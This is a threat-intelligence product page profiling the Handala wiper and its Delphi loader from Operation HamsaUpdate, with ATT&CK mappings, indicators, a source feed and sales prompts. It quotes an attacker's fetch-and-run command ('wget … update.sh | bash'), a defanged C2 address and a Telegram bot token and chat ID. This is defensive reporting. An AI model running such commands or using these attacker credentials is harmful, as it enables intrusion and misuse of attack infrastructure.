MalwareUsed by 1 actor

Handala

Handala is described in the provided content as a destructive wiper malware and also as the name used for a Delphi-coded second-stage loader in the Operation HamsaUpdate intrusion chain. The malware is associated in reporting with the Iran-aligned or Iran-linked Handala group, including claims of disruptive and destructive operations with political messaging and attacks against Israeli and healthcare-related targets. Reported victimology includes critical infrastructure and organizations broadly, a medical technology organization in 2026, and Stryker, where Handala allegedly claimed theft of 50 TB of data and wiping of more than 200,000 systems, servers, and mobile devices; Stryker confirmed a globally disruptive incident affecting its Microsoft environment.

Capabilities directly described in the content include irreversible wiping of data, rendering infected systems inoperable, rapid spread across networks, and evasion techniques. Splunk detection guidance highlights suspicious regasm processes, unauthorized AutoIt script execution, malicious driver drops, abrupt system slowdowns, and creation of unknown files or processes as indicators of Handala activity.

In Operation HamsaUpdate, Handala.exe is identified as a Delphi second-stage loader delivered by a Windows .NET loader disguised as F5UPDATER.EXE in a phishing campaign targeting Israeli customers using F5 BIG-IP vulnerability lures. In that chain, one ZIP variant drops Handala.exe from embedded resources into System32 and executes it. The Handala loader then spearheads execution of an AutoIt-based injector chain using a renamed AutoIt interpreter (Naples.pif) and an obfuscated script (k), which injects RC4-decrypting shellcode, decompresses payloads with LZNT1, and communicates over HTTPS with 31.192.237[.]207:2515. The broader campaign also deployed Windows and Linux wipers, though the Windows wiper itself is separately named Hatef and the Linux wiper Hamsa.

High-confidence infrastructure and behavioral details mentioned in the content include C2 communications to 31.192.237[.]207:2515, use of AutoIt execution, and in related campaign reporting, Telegram-based status reporting via Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA and Chat ID 6932028002. Overall, the content characterizes Handala as a severe destructive threat capable of causing major disruption, downtime, financial loss, data loss, and potential exposure of sensitive information.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Handala

Stryker has suffered a major cyberattack involving wiper malware claimed by Handala, a pro-Palestinian hacktivist group linked to Iran.

via sentinelone blogsentinelone.com

MITRE ATT&CK

Techniques & procedures

8 distinct techniques documented for this family, organized by ATT&CK tactic.

Execution

2 techniques

T1059.003Windows Command ShellEvidence1

“cmd /c mkdir… copy /b … Naples.pif … cmd.exe …”

T1204User ExecutionEvidence1

“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”

Privilege Escalation

1 technique

T1055Process InjectionEvidence1

“AutoIt… inject a piece of shellcode… unpack and execute more shellcode into dialer.exe and dllhost.exe… injected into a Windows Media Player Process…”

Stealth

3 techniques

T1027Obfuscated Files or InformationEvidence1

“obfuscated payload… concealed within… five Base64 encoding steps… executed using the ‘eval’ command.” / “loader conceals its strings with… ADD… AutoIt script… strings… SUB… shellcode… implements the RC4 stream cipher… decrypt another payload… decompressed… LZNT1.”

T1036MasqueradingEvidence1

“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”

T1055Process InjectionEvidence1

“AutoIt… inject a piece of shellcode… unpack and execute more shellcode into dialer.exe and dllhost.exe… injected into a Windows Media Player Process…”

Discovery

1 technique

T1057Process DiscoveryEvidence1

“Handala… detect any active security software… listing all active tasks… tasklist … filtering… using findstr…”

Command and Control

1 technique

T1105Ingress Tool TransferEvidence1

“wget -O - https://…/update.sh | bash” / “Both ZIP files contain… F5UPDATER.EXE… extracts assembly from the resource section. The payload is written to System32 and executed.”

Other

1 technique

T1562.001Disable or Modify ToolsEvidence1

“Its goal is to detect any active security software… and disable it.”

INDICATORS OF COMPROMISE

IOCs tracked for this family

9 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

8 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting

hash.sha256●●●●●●●●●●●●View more in app2 months ago

hash.sha256●●●●●●●●●●●●View more in app3 months ago

hash.sha256●●●●●●●●●●●●View more in app3 years ago

ACTIVITY FEED

Recent activity

4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

4 SOURCESView more in app

polyswarmNews

May 4, 2026

Critical Condition: The 2026 Healthcare Cyber Threat Landscape

Iran-aligned disruptive tooling and operations involving data exfiltration and destructive actions against healthcare-related infrastructure.

sentinelone blogNews

Mar 13, 2026

The Good, the Bad and the Ugly in Cybersecurity - Week 11

Destructive malware used in attacks attributed to Handala to wipe Windows and Linux systems and disrupt operations; the group also claims data theft and public leaking of sensitive data.

splunk researchNews

Jul 31, 2024

Analytics Story: Handala Wiper | Splunk Security Content

A destructive wiper malware that irreversibly deletes data from infected systems, renders them inoperable, uses evasion techniques, and can spread rapidly across networks.

intezer blogNews

Dec 20, 2023

Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers Puts Israeli Infrastructure at Risk - Intezer

Delphi second-stage loader that runs an obfuscated script to enumerate/disable security tooling (via tasklist/findstr), reconstructs and launches a renamed AutoIt interpreter (Naples.pif) with an obfuscated AutoIt script (k). The AutoIt stage injects RC4-decrypting shellcode, decompresses (LZNT1), and executes further payloads, including code that communicates with a C2 over HTTPS (31.192.237[.]207:2515) and injects into multiple processes (e.g., dllhost.exe, Windows Media Player-related processes).

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching9

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping8

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.